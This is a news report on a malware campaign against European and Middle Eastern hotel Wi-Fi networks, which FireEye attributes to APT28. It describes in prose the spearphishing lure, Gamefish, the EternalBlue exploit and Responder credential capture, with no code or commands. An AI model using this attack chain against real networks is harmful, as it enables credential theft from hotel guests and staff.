Researchers have "moderate" confidence the program is being run by APT28.
Researchers have "moderate" confidence the program is being run by APT28.

Travelers to Europe and the Middle East need to be aware of an on-going malware campaign that is targeting hotel and hospitality Wi-Fi networks and being used to glean guest and corporate information.

FireEye researchers have “moderate” confidence that the program is being run by the Russian group APT28, citing the fact that it found malicious documents on these networks that had been used to install the cybergang's signature malware - Gamefish. The document is delivered through a spearphishing attack that uses a document that appears to be a basic reservation form.

Additionally, FireEye claimed that APT28 has incorporated several new techniques with these attacks, including using the EthernalBlue SMB vulnerability that was behind the WannaCry and NotPetya ransomworm attacks launched in May and June of this year.

“Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels,” FireEye said.

Once embedded in the target system the malware deployed Responder, which allows the malicious actors to listen for MBT-NS (UDP/137) broadcasts from the victim's computer as they attempt to connect to the network resources. Responder than pretends to be that resource and causes the computer to send the username and hashed password to the attacker-controlled computer. APT28 then uses these credentials to gain an escalation of privileges on the infected network.

“Travelers must be aware of the threats posed when traveling – especially to foreign countries – and take extra precautions to secure their systems and data. Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible,” FireEye concluded.